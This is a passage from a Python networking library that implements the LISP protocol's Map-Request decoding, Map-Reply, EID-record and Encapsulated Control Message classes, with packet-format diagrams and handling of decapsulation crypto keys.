        on UDP 'port'.  Processes per-ITR-RLOC security LCAFs (storing/
        removing decap crypto keys as a side effect) and the target EID
        record.  Returns the remaining packet, or None on error."""
        packet_format = "I"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)
        first_long = struct.unpack(packet_format, packet[:format_size])
        first_long = first_long[0]
        packet = packet[format_size::]
        packet_format = "Q"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)
        nonce = struct.unpack(packet_format, packet[:format_size])
        packet = packet[format_size::]
        first_long = socket.ntohl(first_long)
        self.auth_bit = True if (first_long & 0x08000000) else False
        self.map_data_present = True if (first_long & 0x04000000) else False
        self.rloc_probe = True if (first_long & 0x02000000) else False
        self.smr_bit = True if (first_long & 0x01000000) else False
        self.pitr_bit = True if (first_long & 0x00800000) else False
        self.smr_invoked_bit = True if (first_long & 0x00400000) else False
        self.mobile_node = True if (first_long & 0x00200000) else False
        self.xtr_id_present = True if (first_long & 0x00100000) else False
        self.local_xtr = True if (first_long & 0x00004000) else False
        self.dont_reply_bit = True if (first_long & 0x00002000) else False
        self.itr_rloc_count = ((first_long >> 8) & 0x1f) + 1
        self.record_count = first_long & 0xff
        self.nonce = nonce[0]
        #
        # Decode xTR-ID if sender set the xtr_id_present bit.
        #
        if (self.xtr_id_present):
            if (self.decode_xtr_id(packet) == False): return(None)
        #endif
        format_size = struct.calcsize("H")
        if (len(packet) < format_size): return(None)
        afi = struct.unpack("H", packet[:format_size])
        self.source_eid.afi = socket.ntohs(afi[0])
        packet = packet[format_size::]
        if (self.source_eid.afi == LISP_AFI_LCAF):
            # Source-EID LCAF is either instance-id or a signed JSON blob.
            save_packet = packet
            packet = self.source_eid.lcaf_decode_iid(packet)
            if (packet == None):
                packet = self.lcaf_decode_json(save_packet)
                if (packet == None): return(None)
            #endif
        elif (self.source_eid.afi != LISP_AFI_NONE):
            packet = self.source_eid.unpack_address(packet)
            if (packet == None): return(None)
        #endif
        self.source_eid.mask_len = self.source_eid.host_mask_len()
        no_crypto = (os.getenv("LISP_NO_CRYPTO") != None)
        self.itr_rlocs = []
        while (self.itr_rloc_count != 0):
            format_size = struct.calcsize("H")
            if (len(packet) < format_size): return(None)
            afi = struct.unpack("H", packet[:format_size])[0]
            itr = lisp_address(LISP_AFI_NONE, "", 32, 0)
            itr.afi = socket.ntohs(afi)
            #
            # If Security Type LCAF, get security parameters and store in
            # lisp_keys().
            #
            if (itr.afi != LISP_AFI_LCAF):
                if (len(packet) < itr.addr_length()): return(None)
                packet = itr.unpack_address(packet[format_size::])
                if (packet == None): return(None)
                if (no_crypto):
                    self.itr_rlocs.append(itr)
                    self.itr_rloc_count -= 1
                    continue
                #endif
                addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
                #
                # Decide if we should remove security key state if ITR decided
                # to stop doing key exchange when it previously had.
                #
                if (lisp_nat_traversal and itr.is_private_address() and \
                    source): itr = source
                rloc_keys = lisp_crypto_keys_by_rloc_decap
                if (rloc_keys.has_key(addr_str)): rloc_keys.pop(addr_str)
                #
                # If "ipc-data-plane = yes" is configured, we need to tell the
                # data-plane from the lisp-etr process there is no longer a
                # decryption key.
                #
                lisp_write_ipc_decap_key(addr_str, None)
            else:
                orig_packet = packet
                decode_key = lisp_keys(1)
                packet = decode_key.decode_lcaf(orig_packet, 0)
                if (packet == None): return(None)
                #
                # Other side may not do ECDH.
                #
                cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM,
                    LISP_CS_25519_CHACHA]
                if (decode_key.cipher_suite in cs_list):
                    if (decode_key.cipher_suite == LISP_CS_25519_CBC or
                        decode_key.cipher_suite == LISP_CS_25519_GCM):
                        key = lisp_keys(1, do_poly=False, do_chacha=False)
                    #endif
                    if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
                        key = lisp_keys(1, do_poly=True, do_chacha=True)
                    #endif
                else:
                    key = lisp_keys(1, do_poly=False, do_curve=False,
                        do_chacha=False)
                #endif
                packet = key.decode_lcaf(orig_packet, 0)
                if (packet == None): return(None)
                if (len(packet) < format_size): return(None)
                afi = struct.unpack("H", packet[:format_size])[0]
                itr.afi = socket.ntohs(afi)
                if (len(packet) < itr.addr_length()): return(None)
                packet = itr.unpack_address(packet[format_size::])
                if (packet == None): return(None)
                if (no_crypto):
                    self.itr_rlocs.append(itr)
                    self.itr_rloc_count -= 1
                    continue
                #endif
                addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
                stored_key = None
                if (lisp_nat_traversal and itr.is_private_address() and \
                    source): itr = source
                if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)):
                    keys = lisp_crypto_keys_by_rloc_decap[addr_str]
                    stored_key = keys[1] if keys and keys[1] else None
                #endif
                new = True
                if (stored_key):
                    if (stored_key.compare_keys(key)):
                        # Same remote parameters: keep existing key state.
                        self.keys = [None, stored_key, None, None]
                        lprint("Maintain stored decap-keys for RLOC {}". \
                            format(red(addr_str, False)))
                    else:
                        # Remote side rekeyed: carry over local keypair.
                        new = False
                        remote = bold("Remote decap-rekeying", False)
                        lprint("{} for RLOC {}".format(remote, red(addr_str,
                            False)))
                        key.copy_keypair(stored_key)
                        key.uptime = stored_key.uptime
                        stored_key = None
                    #endif
                #endif
                if (stored_key == None):
                    self.keys = [None, key, None, None]
                    if (lisp_i_am_etr == False and lisp_i_am_rtr == False):
                        key.local_public_key = None
                        lprint("{} for {}".format(bold("Ignoring decap-keys",
                            False), red(addr_str, False)))
                    elif (key.remote_public_key != None):
                        if (new):
                            lprint("{} for RLOC {}".format( \
                                bold("New decap-keying", False),
                                red(addr_str, False)))
                        #endif
                        key.compute_shared_key("decap")
                        key.add_key_by_rloc(addr_str, False)
                    #endif
                #endif
            #endif
            self.itr_rlocs.append(itr)
            self.itr_rloc_count -= 1
        #endwhile
        format_size = struct.calcsize("BBH")
        if (len(packet) < format_size): return(None)
        subscribe, mask_len, afi = struct.unpack("BBH", packet[:format_size])
        self.subscribe_bit = (subscribe & 0x80)
        self.target_eid.afi = socket.ntohs(afi)
        packet = packet[format_size::]
        self.target_eid.mask_len = mask_len
        if (self.target_eid.afi == LISP_AFI_LCAF):
            packet, target_group = self.target_eid.lcaf_decode_eid(packet)
            if (packet == None): return(None)
            if (target_group): self.target_group = target_group
        else:
            packet = self.target_eid.unpack_address(packet)
            if (packet == None): return(None)
            packet = packet[format_size::]
        #endif
        return(packet)
    #enddef
    def print_eid_tuple(self):
        """Return the (eid, group) display string for the target EID."""
        return(lisp_print_eid_tuple(self.target_eid, self.target_group))
    #enddef
    def encode_xtr_id(self, packet):
        """Append the 128-bit xTR-ID (byte-swapped to network order) to
        'packet' and return it."""
        xtr_id_upper = self.xtr_id >> 64
        xtr_id_lower = self.xtr_id & 0xffffffffffffffff
        xtr_id_upper = byte_swap_64(xtr_id_upper)
        xtr_id_lower = byte_swap_64(xtr_id_lower)
        packet += struct.pack("QQ", xtr_id_upper, xtr_id_lower)
        return(packet)
    #enddef
    def decode_xtr_id(self, packet):
        """Extract the 128-bit xTR-ID from the trailing 16 bytes of
        'packet'.  Returns True on success, None when too short."""
        format_size = struct.calcsize("QQ")
        if (len(packet) < format_size): return(None)
        packet = packet[len(packet)-format_size::]
        xtr_id_upper, xtr_id_lower = struct.unpack("QQ", packet[:format_size])
        xtr_id_upper = byte_swap_64(xtr_id_upper)
        xtr_id_lower = byte_swap_64(xtr_id_lower)
        self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
        return(True)
    #enddef
#endclass
#
# Map-Reply Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=2 |P|E|S| Reserved | Hop Count | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R |N|Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_reply():
    """LISP Map-Reply message (type 2), fixed header only (see format
    diagram above). The EID-records following the header are parsed
    separately by lisp_eid_record()/lisp_rloc_record().
    """
    def __init__(self):
        self.rloc_probe = False           # P-bit: reply to an RLOC-probe
        self.echo_nonce_capable = False   # E-bit
        self.security = False             # S-bit
        self.record_count = 0
        self.hop_count = 0
        self.nonce = 0
        self.keys = None                  # lisp-crypto keys found by nonce
    #enddef
    def print_map_reply(self):
        """Log a one-line summary of the Map-Reply header."""
        line = "{} -> flags: {}{}{}, hop-count: {}, record-count: {}, " + \
            "nonce: 0x{}"
        lprint(line.format(bold("Map-Reply", False), \
            "R" if self.rloc_probe else "r",
            "E" if self.echo_nonce_capable else "e",
            "S" if self.security else "s", self.hop_count, self.record_count,
            lisp_hex_string(self.nonce)))
    #enddef
    def encode(self):
        """Return the packed 12-byte header: type/flags/hop-count/
        record-count first-long in network byte order, followed by the
        64-bit nonce (packed as-is, no byte swap)."""
        first_long = (LISP_MAP_REPLY << 28) | self.record_count
        first_long |= self.hop_count << 8
        if (self.rloc_probe): first_long |= 0x08000000
        if (self.echo_nonce_capable): first_long |= 0x04000000
        if (self.security): first_long |= 0x02000000
        packet = struct.pack("I", socket.htonl(first_long))
        packet += struct.pack("Q", self.nonce)
        return(packet)
    #enddef
    def decode(self, packet):
        """Parse the fixed header from 'packet'. Returns the remaining
        bytes or None when the packet is too short. If lisp-crypto keys
        were negotiated under this nonce, attach them and retire the
        nonce-indexed entry."""
        packet_format = "I"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)
        first_long = struct.unpack(packet_format, packet[:format_size])
        first_long = first_long[0]
        packet = packet[format_size::]
        packet_format = "Q"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)
        nonce = struct.unpack(packet_format, packet[:format_size])
        packet = packet[format_size::]
        first_long = socket.ntohl(first_long)
        self.rloc_probe = True if (first_long & 0x08000000) else False
        self.echo_nonce_capable = True if (first_long & 0x04000000) else False
        self.security = True if (first_long & 0x02000000) else False
        self.hop_count = (first_long >> 8) & 0xff
        self.record_count = first_long & 0xff
        self.nonce = nonce[0]
        #
        # Use "in" rather than dict.has_key() (removed in python3, same
        # behavior in python2).
        #
        if (self.nonce in lisp_crypto_keys_by_nonce):
            self.keys = lisp_crypto_keys_by_nonce[self.nonce]
            self.keys[1].delete_key_by_nonce(self.nonce)
        #endif
        return(packet)
    #enddef
#endclass
#
# This is the structure of an EID record in a Map-Request, Map-Reply, and
# Map-Register.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Locator Count | EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd | Map-Version Number | EID-Prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-Prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When E is set, the entire locator-set records are encrypted with the chacha
# cipher.
#
# And this for a EID-record in a Map-Referral.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Referral Count| EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |SigCnt | Map Version Number | EID-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_eid_record():
    """One EID-record from a Map-Request/Map-Reply/Map-Register or
    Map-Referral (see format diagrams above). Encodes and decodes the
    12-byte fixed record header plus the EID-prefix that follows it.
    """
    def __init__(self):
        self.record_ttl = 0          # minutes; high-order bit means seconds
        self.rloc_count = 0
        self.action = 0
        self.authoritative = False
        self.ddt_incomplete = False
        self.signature_count = 0     # SigCnt, used in Map-Referral records
        self.map_version = 0
        self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
    #enddef
    def print_prefix(self):
        """Return a colorized string for the EID-prefix, or the (S,G)
        pair when this is a multicast record."""
        if (self.group.is_null()):
            return(green(self.eid.print_prefix(), False))
        #endif
        return(green(self.eid.print_sg(self.group), False))
    #enddef
    def print_ttl(self):
        """Return the record TTL as a display string. High-order bit of
        record_ttl flags a value in seconds; otherwise the TTL is in
        minutes and is shown as hours when evenly divisible by 60."""
        ttl = self.record_ttl
        if (self.record_ttl & 0x80000000):
            ttl = str(self.record_ttl & 0x7fffffff) + " secs"
        elif ((ttl % 60) == 0):
            ttl = str(ttl/60) + " hours"
        else:
            ttl = str(ttl) + " mins"
        #endif
        return(ttl)
    #enddef
    def store_ttl(self):
        """Return the TTL converted to seconds (record_ttl is in minutes
        unless the high-order bit flags a value already in seconds)."""
        ttl = self.record_ttl * 60
        if (self.record_ttl & 0x80000000): ttl = self.record_ttl & 0x7fffffff
        return(ttl)
    #enddef
    def print_record(self, indent, ddt):
        """Log a one-line summary of this EID-record. 'ddt' selects the
        Map-Referral action-string table instead of the Map-Reply one."""
        incomplete = ""
        sig_count = ""
        action_str = bold("invalid-action", False)
        if (ddt):
            if (self.action < len(lisp_map_referral_action_string)):
                action_str = lisp_map_referral_action_string[self.action]
                action_str = bold(action_str, False)
                incomplete = (", " + bold("ddt-incomplete", False)) if \
                    self.ddt_incomplete else ""
                sig_count = (", sig-count: " + str(self.signature_count)) if \
                    (self.signature_count != 0) else ""
            #endif
        else:
            if (self.action < len(lisp_map_reply_action_string)):
                action_str = lisp_map_reply_action_string[self.action]
                if (self.action != LISP_NO_ACTION):
                    action_str = bold(action_str, False)
                #endif
            #endif
        #endif
        afi = LISP_AFI_LCAF if (self.eid.afi < 0) else self.eid.afi
        line = ("{}EID-record -> record-ttl: {}, rloc-count: {}, action: " +
            "{}, {}{}{}, map-version: {}, afi: {}, [iid]eid/ml: {}")
        lprint(line.format(indent, self.print_ttl(), self.rloc_count,
            action_str, "auth" if (self.authoritative is True) else "non-auth",
            incomplete, sig_count, self.map_version, afi,
            green(self.print_prefix(), False)))
    #enddef
    def encode(self):
        """Pack the record header and EID-prefix. LCAF encoding is used
        for (S,G) entries, geo-prefixes, and non-zero instance-IDs."""
        action = self.action << 13
        if (self.authoritative): action |= 0x1000
        if (self.ddt_incomplete): action |= 0x800
        #
        # Decide on AFI value.
        #
        afi = self.eid.afi if (self.eid.instance_id == 0) else LISP_AFI_LCAF
        if (afi < 0): afi = LISP_AFI_LCAF
        sg = (self.group.is_null() == False)
        if (sg): afi = LISP_AFI_LCAF
        sig_mv = (self.signature_count << 12) | self.map_version
        mask_len = 0 if self.eid.is_binary() == False else self.eid.mask_len
        packet = struct.pack("IBBHHH", socket.htonl(self.record_ttl),
            self.rloc_count, mask_len, socket.htons(action),
            socket.htons(sig_mv), socket.htons(afi))
        #
        # Check if we are encoding an (S,G) entry.
        #
        if (sg):
            packet += self.eid.lcaf_encode_sg(self.group)
            return(packet)
        #endif
        #
        # Check if we are encoding an geo-prefix in an EID-record.
        #
        if (self.eid.afi == LISP_AFI_GEO_COORD and self.eid.instance_id == 0):
            packet = packet[0:-2]
            packet += self.eid.address.encode_geo()
            return(packet)
        #endif
        #
        # Check if instance-ID needs to be encoded in the EID record.
        #
        if (afi == LISP_AFI_LCAF):
            packet += self.eid.lcaf_encode_iid()
            return(packet)
        #endif
        #
        # Just encode the AFI for the EID.
        #
        packet += self.eid.pack_address()
        return(packet)
    #enddef
    def decode(self, packet):
        """Parse one EID-record from 'packet'. Returns the remaining
        bytes, or None when the packet is too short."""
        packet_format = "IBBHHH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)
        self.record_ttl, self.rloc_count, self.eid.mask_len, action, \
            self.map_version, self.eid.afi = \
            struct.unpack(packet_format, packet[:format_size])
        self.record_ttl = socket.ntohl(self.record_ttl)
        action = socket.ntohs(action)
        self.action = (action >> 13) & 0x7
        self.authoritative = True if ((action >> 12) & 1) else False
        self.ddt_incomplete = True if ((action >> 11) & 1) else False
        self.map_version = socket.ntohs(self.map_version)
        self.signature_count = self.map_version >> 12
        self.map_version = self.map_version & 0xfff
        self.eid.afi = socket.ntohs(self.eid.afi)
        self.eid.instance_id = 0
        packet = packet[format_size::]
        #
        # Check if instance-ID LCAF is encoded in the EID-record.
        #
        if (self.eid.afi == LISP_AFI_LCAF):
            packet, group = self.eid.lcaf_decode_eid(packet)
            if (group): self.group = group
            self.group.instance_id = self.eid.instance_id
            return(packet)
        #endif
        packet = self.eid.unpack_address(packet)
        return(packet)
    #enddef
    def print_eid_tuple(self):
        """Return a printable (EID, group) tuple string."""
        return(lisp_print_eid_tuple(self.eid, self.group))
    #enddef
#endclass
#
# Encapsualted Control Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# OH | (uses RLOC addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4342 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LH |Type=8 |S|D|E|M| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# IH | (uses RLOC or EID addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = yyyy |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LCM | LISP Control Message |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_UDP_PROTOCOL = 17           # IP protocol number for UDP (inner header)
LISP_DEFAULT_ECM_TTL = 128       # TTL/hop-limit for the ECM inner IP header
class lisp_ecm():
    """Encapsulated Control Message (type 8): the ECM header plus the
    inner IPv4/IPv6 header and inner UDP header that wrap a LISP
    control message (see format diagram above).
    """
    def __init__(self, sport):
        # ECM header flag bits (S/D/E/M).
        self.security = False
        self.ddt = False
        self.to_etr = False
        self.to_ms = False
        # Inner IP header fields.
        self.length = 0
        self.ttl = LISP_DEFAULT_ECM_TTL
        self.protocol = LISP_UDP_PROTOCOL
        self.ip_checksum = 0
        self.source = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
        # Inner UDP header fields; control messages go to port 4342.
        self.udp_sport = sport
        self.udp_dport = LISP_CTRL_PORT
        self.udp_checksum = 0
        self.udp_length = 0
        self.afi = LISP_AFI_NONE
    #enddef
    def print_ecm(self):
        """Log a one-line summary of the ECM flags and inner headers."""
        line = ("{} -> flags: {}{}{}{}, " + \
            "inner IP: {} -> {}, inner UDP: {} -> {}")
        lprint(line.format(bold("ECM", False), "S" if self.security else "s",
            "D" if self.ddt else "d", "E" if self.to_etr else "e",
            "M" if self.to_ms else "m",
            green(self.source.print_address(), False),
            green(self.dest.print_address(), False), self.udp_sport,
            self.udp_dport))
    def encode(self, packet, inner_source, inner_dest):
        """Build and return the ECM + inner IP + inner UDP headers for
        'packet'; the caller appends the control message itself. Length
        fields are computed from len(packet)."""
        self.udp_length = len(packet) + 8
        self.source = inner_source
        self.dest = inner_dest
        if (inner_dest.is_ipv4()):
            self.afi = LISP_AFI_IPV4
            # IPv4 total-length includes the 20-byte IP header.
            self.length = self.udp_length + 20
        #endif
        if (inner_dest.is_ipv6()):
            self.afi = LISP_AFI_IPV6
            # IPv6 payload-length excludes the IP header itself.
            self.length = self.udp_length
        #endif
        #
        # Encode ECM header first, then the IPv4 or IPv6 header, then the
        # UDP header.
        #
        first_long = (LISP_ECM << 28)
        if (self.security): first_long |= 0x08000000
        if (self.ddt): first_long |= 0x04000000
        if (self.to_etr): first_long |= 0x02000000
        if (self.to_ms): first_long |= 0x01000000
        ecm = struct.pack("I", socket.htonl(first_long))
        ip = ""
        if (self.afi == LISP_AFI_IPV4):
            ip = struct.pack("BBHHHBBH", 0x45, 0, socket.htons(self.length),
                0, 0, self.ttl, self.protocol, socket.htons(self.ip_checksum))
            ip += self.source.pack_address()
            ip += self.dest.pack_address()
            # Fill in the IPv4 header checksum over the 20-byte header.
            ip = lisp_ip_checksum(ip)
        #endif
        if (self.afi == LISP_AFI_IPV6):
            ip = struct.pack("BBHHBB", 0x60, 0, 0, socket.htons(self.length),
                self.protocol, self.ttl)
            ip += self.source.pack_address()
            ip += self.dest.pack_address()
        #endif
        s = socket.htons(self.udp_sport)
        d = socket.htons(self.udp_dport)
        l = socket.htons(self.udp_length)
        c = socket.htons(self.udp_checksum)
        udp = struct.pack("HHHH", s, d, l, c)
        return(ecm + ip + udp)
    #enddef
    def decode(self, packet):
        """Parse ECM + inner IP + inner UDP headers from 'packet'.
        Returns the remaining bytes (the control message) or None if
        any header is truncated."""
        #
        # Decode ECM header.
        #
        packet_format = "I"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)
        first_long = struct.unpack(packet_format, packet[:format_size])
        first_long = socket.ntohl(first_long[0])
        self.security = True if (first_long & 0x08000000) else False
        self.ddt = True if (first_long & 0x04000000) else False
        self.to_etr = True if (first_long & 0x02000000) else False
        self.to_ms = True if (first_long & 0x01000000) else False
        packet = packet[format_size::]
        #
        # Decode inner IPv4/IPv6 and UDP header.
        #
        if (len(packet) < 1): return(None)
        version = struct.unpack("B", packet[0:1])[0]
        version = version >> 4
        if (version == 4):
            format_size = struct.calcsize("HHIBBH")
            if (len(packet) < format_size): return(None)
            x, l, x, t, p, c = struct.unpack("HHIBBH", packet[:format_size])
            self.length = socket.ntohs(l)
            self.ttl = t
            self.protocol = p
            self.ip_checksum = socket.ntohs(c)
            self.source.afi = self.dest.afi = LISP_AFI_IPV4
            #
            # Zero out IPv4 header checksum.
            #
            p = struct.pack("H", 0)
            offset1 = struct.calcsize("HHIBB")
            offset2 = struct.calcsize("H")
            packet = packet[:offset1] + p + packet[offset1+offset2:]
            packet = packet[format_size::]
            packet = self.source.unpack_address(packet)
            if (packet == None): return(None)
            packet = self.dest.unpack_address(packet)
            if (packet == None): return(None)
        #endif
        if (version == 6):
            format_size = struct.calcsize("IHBB")
            if (len(packet) < format_size): return(None)
            x, l, p, t = struct.unpack("IHBB", packet[:format_size])
            self.length = socket.ntohs(l)
            self.protocol = p
            self.ttl = t
            self.source.afi = self.dest.afi = LISP_AFI_IPV6
            packet = packet[format_size::]
            packet = self.source.unpack_address(packet)
            if (packet == None): return(None)
            packet = self.dest.unpack_address(packet)
            if (packet == None): return(None)
        #endif
        self.source.mask_len = self.source.host_mask_len()
        self.dest.mask_len = self.dest.host_mask_len()
        format_size = struct.calcsize("HHHH")
        if (len(packet) < format_size): return(None)
        s, d, l, c = struct.unpack("HHHH", packet[:format_size])
        self.udp_sport = socket.ntohs(s)
        self.udp_dport = socket.ntohs(d)
        self.udp_length = socket.ntohs(l)
        self.udp_checksum = socket.ntohs(c)
        packet = packet[format_size::]
        return(packet)
    #enddef
#endclass
#
# This is the structure of an RLOC record in a Map-Request, Map-Reply, and
# Map-Register's EID record.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# /| Priority | Weight | M Priority | M Weight |
# L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# o | Unused Flags |L|p|R| Loc-AFI |
# c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \| Locator |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# AFI-List LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 1 | Rsvd2 | 2 + 4 + 2 + 16 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 1 | IPv4 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv4 Address | AFI = 2 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Geo Coordinate LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 5 | Rsvd2 | Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |U|N|E|A|M|R|K| Reserved | Location Uncertainty |
